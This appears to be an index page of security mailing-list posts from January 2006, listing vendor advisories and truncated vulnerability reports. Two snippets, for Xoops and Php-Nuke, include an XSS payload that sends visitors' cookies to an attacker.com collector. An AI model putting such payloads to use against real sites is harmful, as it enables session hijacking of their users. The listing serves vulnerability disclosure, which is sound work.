[SECURITY] [DSA 933-1] New hylafax packages fix arbitrary command execution
2006-01-10 Michael Stone (mstone klecker debian org)

Research: Malware Action Detection and Protection
2006-01-07 Arman Nayyeri (arman-n phreaker net)
Hi, After 15 months of work it is MADP's showtime. The people who remember my last finding about windows media player vulns should remember IDT project and I must say that they are both the same but with different names. The following is a plain text copy of MADP v1.0 document. First read the docum

MDKSA-2006:003 - Updated poppler packages fix several vulnerabilities
2006-01-09 Mandriva Security Team (xsecurity mandriva com)

MDKSA-2006:008 - Updated koffice packages fix several vulnerabilities
2006-01-06 Mandriva Security Team (security mandriva com)

MDKSA-2006:006 - Updated gpdf packages fix several vulnerabilities
2006-01-09 Mandriva Security Team (xsecurity mandriva com)

MDKSA-2006:005 - Updated xpdf packages fix several vulnerabilities
2006-01-09 Mandriva Security Team (xsecurity mandriva com)

MDKSA-2006:009 - Updated apache2-mod_auth_pgsql packages fix several vulnerabilities
2006-01-07 Mandriva Security Team (xsecurity mandriva com)

[eVuln] 427BB Multiple Vulnerabilities (Cookie-based Authentication Bypass, SQL Injections, XSS)
2006-01-07 alex evuln com
New eVuln Advisory: 427BB Multiple Vulnerabilities (Cookie-based Authentication Bypass, SQL Injections, XSS) --------------------Summary---------------- Software: 427BB Software's Web Site: http://sourceforge.net/projects/fourtwosevenbb Versions: checked: 2.2 and 2.2.1 Critical Level: Dangerous Ty

Xoops Pool Module IMG Tag Cross Site Scripting
2006-01-07 night_warrior771 hotmail com
##Night_Warrior<Kurdihs Hacker> ##night_warrior771[at]hotmail.com ##Xoops Pool Module IMG Tag Cross Site Scripting ##Contact :night_warrior771[at]hotmail.com Post Comment this Code: <img src="javascript:window.navigate('http://attacker.com/cookies.php?c='+doc ument.cookie);" cookies.php $cookie = $_G

Php-Nuke Pool and News Module IMG Tag Cross Site
2006-01-07 night_warrior771 hotmail com
##Night_Warrior<Kurdihs Hacker> ##night_warrior771[at]hotmail.com ##Php-Nuke Pool and News Module IMG Tag Cross Site Scripting ##Contact :night_warrior771[at]hotmail.com Post Comment this Code: <img src="javascript:window.navigate('http://attacker.com/cookies.php?c='+doc ument.cookie);" cookies.php $

AIM Multiple Cross Site Scripting Vulnerability
2006-01-08 simo morx org
Title: AIM Multiple Cross Site Scripting Author: Simo Ben youssef aka _6mO_HaCk <simo_at_morx_org> Discovered: 26 December 2005 Published: 7 January 2006 MorX Security Research Team http://www.morx.org Service: Web Vendor: AIM.com Vulnerability: Cross Site Scripting / Cookie-Theft / Relogin atta

Html_Injection in vBulletin 3.5.2
2006-01-08 the_bekir savsak com
Vulnerable Version: 3.5.2 (prior versions also may be affected) Bug: Html_Injection (Second order Cross_Site_Scripting) Exploitation: Remote with browser Html_Injection : The software does not properly filter HTML tags in the title of events before being passed to user in 'calendar.php'&'reminder.

MDKSA-2006:004 - Updated pdftohtml packages fix several vulnerabilities
2006-01-09 Mandriva Security Team (xsecurity mandriva com)

MDKSA-2006:008 - Updated koffice packages fix several vulnerabilities
2006-01-09 Mandriva Security Team (xsecurity mandriva com)

AOL Multiple Cross Site Scripting Vulnerability
2006-01-08 simo morx org
Title: AOL Multiple Cross Site Scripting Author: Simo Ben youssef aka _6mO_HaCk <simo_at_morx_org> Discovered: 26 December 2005 Published: 7 January 2006 MorX Security Research Team http://www.morx.org Service: Web Vendor: AOL.com Vulnerability: Cross Site Scripting / Cookie-Theft / Relogin atta

iDefense Security Advisory 01.09.06: Multiple Vendor mod_auth_pgsql Format String Vulnerability
2006-01-09 labs-no-reply (at) idefense (dot) com (labs-no-reply idefense com)
Multiple Vendor mod_auth_pgsql Format String Vulnerability iDefense Security Advisory 01.09.06 http://www.idefense.com/intelligence/vulnerabilities/display.php?id=367 January 09, 2006 I. BACKGROUND The mod_auth_pgsql apache module allows user authentication against information stored in a Postgre

[SECURITY] [DSA 932-1] New kpdf packages fix arbitrary code execution
2006-01-09 joey infodrom org (Martin Schulze)

Digital Armaments Security Advisory 01.09.2006: Apache auth_ldap module Multiple Format Strings Vulnerability
2006-01-09 info digitalarmaments com
Digital Armaments advisory is 12.22.2005 http://www.digitalarmaments.com/2006090173928420.html I. Background auth_ldap is an LDAP authentication module for Apache, the world's most popular web server. auth_ldap has excellent performance, and supports Apache on both Unix and Windows NT. It also has

[eVuln] Venom Board SQL Injection Vulnerability
2006-01-09 alex evuln com
New eVuln Advisory: Venom Board SQL Injection Vulnerability --------------------Summary---------------- Software: Venom Board Software's Web Site: http://sourceforge.net/projects/venomboard/ Versions: 1.22 Critical Level: Moderate Type: Cross-Site Scripting Class: Remote Status: Unpatched Exploit:

[SECURITY] [DSA 931-1] New xpdf packages fix arbitrary code execution
2006-01-09 joey infodrom org (Martin Schulze)

[eVuln] Foxrum BBCode XSS Vulnerability
2006-01-09 alex evuln com
New eVuln Advisory: Foxrum BBCode XSS Vulnerability --------------------Summary---------------- Software: Foxrum Software's Web Site: http://www.foxrum.fr.st/ Versions: 4.0.4f Critical Level: Harmless Type: Cross-Site Scripting Class: Remote Status: Unpatched Exploit: Available Solution: Available

NetBSD Security Advisory 2006-002: settimeofday() time wrap
2006-01-09 NetBSD Security Officer (security-officer NetBSD org)

NetBSD Security Advisory 2006-001: Kernfs kernel memory disclosure
2006-01-09 NetBSD Security Officer (security-officer NetBSD org)

[SECURITY] [DSA 930-1] New smstools packages fix format string vulnerability
2006-01-09 Michael Stone (mstone klecker debian org)

[SECURITY] [DSA 929-1] New petris packages fix buffer overflow
2006-01-09 Michael Stone (mstone klecker debian org)

[UPDATE]Microsoft Windows GRE WMF Format Multiple Unauthorized Memory Access Vulnerabilities
2006-01-09 frankruder hotmail com
Microsoft Windows GRE WMF Format Multiple Unauthorized Memory Access Vulnerabilities //this bug report is update for <<Microsoft Windows GRE WMF Format Multiple Memory Overrun Vulnerabilities>> by cocoruder 2006.01.07 by cocoruder page:http://ruder.cdut.net email:frankruder_at_hotmail.com Last Up
Debian Security Advisory DSA 933-1 security (at) debian (dot) org
http://www.debian.org/security/ Michael Stone
January 9, 2006